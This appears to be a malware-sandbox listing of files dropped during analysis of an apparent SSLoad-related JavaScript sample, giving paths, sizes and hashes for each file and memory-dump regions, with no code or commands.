SHA51299525aaab2ab608134b5d66b5313e7fc3c2e2877395c5c171897d7a6c66efb26b606de1a4cb01118c2738ea4b6542e4eb4983e631231b3f340bf85e509a9589e
-
C:\Users\Admin\AppData\Local\sharepoint\forcedelctl.dllFilesize
956KB
MD5b28a478eb5b99efcdc7caf428bffb89a
SHA1d394c7b8fe15753bfbff79fb4f648f6f8bae70f9
SHA2563bca1dcaef4430272b9029c9a4bc8be0d45ecff66e8de8679ed30d8afab00f6f
SHA512decb2581f64949bfaaaf0368917f0705d7a4b7392ec272eda025cf06a4384ec4cdd5202081c2e085f00645029dd96bfef262e8628bed1861185adf6281c1cc88
-
C:\Users\Admin\Desktop\kjgghhj\2024-04-17-IOCs-from-SSLoad-activity.txtFilesize
4KB
MD5adb0c4b7e77a1b56fa3e765047a0a19a
SHA1a6f53658d4ac8730f5d809cd9d833c4c0c1d9019
SHA25689394738e3ba17782ee420e7043226090310fbbf6485657d2014c1462d829bc2
SHA51217671ced965346e5e1cd7eb835a04bbb607680e2d63115ecbf3137c15bae4b2d323e0739a8f79a364016c989cb567030cd07e941b62bebee8d351b499206e742
-
C:\Users\Admin\Desktop\kjgghhj\Doc_013_90b156084-36i39529q5318-5545n0.jsFilesize
860KB
MD5a19108f07f6bc323fd351e46fcf76fd3
SHA142a811f94a7294d6d870641f4a54f5ab67e23d16
SHA2562b36385eea638d0d1b6cd608a1ecf500281c94cbb6454fe1bf13dc92e4a8b028
SHA512a79abcff48c6c87ef51d2ab09d6978014c18b30709260220ca4d38217a4591b6dd7065e1f69da896b1b0d50426a7204e5b01fc1015e30fabf7786cfce6d5faf7
-
C:\Users\Admin\Desktop\kjgghhj\Doc_013_90b156084-36i39529q5318-5545n0.js-stripped.txtFilesize
1KB
MD5867fc9cba41c84586144bd84d30566f4
SHA1ab69bb14eebd02b08e4c1b99b0739d119db7746a
SHA25654d1824db32b28e82ac04fe2e3d88796c12c9a04e76d6025714861f43d862129
SHA51232d8fd157c232677950571ed76ebfabb632f1512ae785dddf950f9d9ac24d88929c3653b42f31e2afc57832af92477dfdcdd04d4c2f6dde8e7671f020fb6ca50
-
C:\Users\Admin\Desktop\kjgghhj\avp.msiFilesize
1.4MB
MD54d81be09c23e02fab7364e508c21c111
SHA152cae521d7a808c8206f4b5afd6b037bc573b50e
SHA256dcae57ec4b69236146f744c143c42cc8bdac9da6e991904e6dbf67ec1179286a
SHA5124f5b4fdeb9a056025455ede8ee6e1757da8db64f9692df2a46558a3c04aaec551734b4d75803bbd579e1163b9aba5005f71c5efb22ee3d336779804a11b2b5a5
-
C:\Users\Admin\Downloads\Unconfirmed 564349.crdownloadFilesize
2.0MB
MD53117207664340b08ae8197d504348de1
SHA1240104337afbf53f261df29c09239480642b6936
SHA256151fe8f44b4257308aae4dd4a4081fe85d465756b137ed29a10638b246a60a01
SHA51225493e6ed25b17ad219cc8964a55ae0a2ac10be86dc7bb15d35938f5341dd59fbd149cb7624cf3b9564b4f88d04da094d4218e60846e6c84feb0f0e69d378a8e
-
\??\GLOBALROOT\Device\HarddiskVolumeShadowCopy2\System Volume Information\SPP\metadata-2Filesize
23.7MB
MD59416ef7532c00a247412c82c84bb8122
SHA154852bfd929a42737796697d394917d0c0158f31
SHA2564d711c3c755f1709fdbe075d1b845d50094d86fda46b6ed2e390f3d218d68464
SHA512d64bea29cf3b6fa1e95a9e2433c1c5d229d59c55baf71170d8781de5921c819aac1bc477cf4787d640022ea7454add0d020cf50ac3e4616561e3b183dc1346b8
-
\??\Volume{a968b372-0000-0000-0000-d01200000000}\System Volume Information\SPP\OnlineMetadataCache\{843a17f9-9ecd-49a6-84d6-fc6aaf72e97e}_OnDiskSnapshotPropFilesize
6KB
MD506347319e840a70f5d2be693001bc31e
SHA1d85c0657f42433f691d35d14635f91ac6186c196
SHA256accd019a54ef0c0d94494ecf25120940ca18400d0380d2e0bce5875ca6cc9dc6
SHA5122e535bec2bb52038c9862cd8d9a647dd4121333f1dd4525c08ae2333fbddf783908048b56c56f843991f336d9fa708771a59c774699afaa2324d29b9199a2e9a
-
\??\pipe\LOCAL\crashpad_4628_GWVWPVAIEVXKOBCWMD5
d41d8cd98f00b204e9800998ecf8427e
SHA1da39a3ee5e6b4b0d3255bfef95601890afd80709
SHA256e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855
SHA512cf83e1357eefb8bdf1542850d66d8007d620e4050b5715dc83f4a921d36ce9ce47d0d13c5d85f2b0ff8318d2877eec2f63b931bd47417a81a538327af927da3e
-
memory/1952-290-0x0000000010000000-0x00000000100F9000-memory.dmpFilesize
996KB
-
memory/1952-291-0x0000000003530000-0x00000000035A3000-memory.dmpFilesize
460KB
-
memory/2408-298-0x0000021D56410000-0x0000021D56411000-memory.dmpFilesize
4KB
-
memory/2408-300-0x0000021D56410000-0x0000021D56411000-memory.dmpFilesize
4KB
-
memory/2408-304-0x0000021D56410000-0x0000021D56411000-memory.dmpFilesize
4KB
-
memory/2408-305-0x0000021D56410000-0x0000021D56411000-memory.dmpFilesize
4KB
-
memory/2408-310-0x0000021D56410000-0x0000021D56411000-memory.dmpFilesize
4KB
-
memory/2408-309-0x0000021D56410000-0x0000021D56411000-memory.dmpFilesize
4KB
-
memory/2408-308-0x0000021D56410000-0x0000021D56411000-memory.dmpFilesize
4KB
-
memory/2408-307-0x0000021D56410000-0x0000021D56411000-memory.dmpFilesize
4KB
-
memory/2408-306-0x0000021D56410000-0x0000021D56411000-memory.dmpFilesize
4KB
-
memory/2408-299-0x0000021D56410000-0x0000021D56411000-memory.dmpFilesize
4KB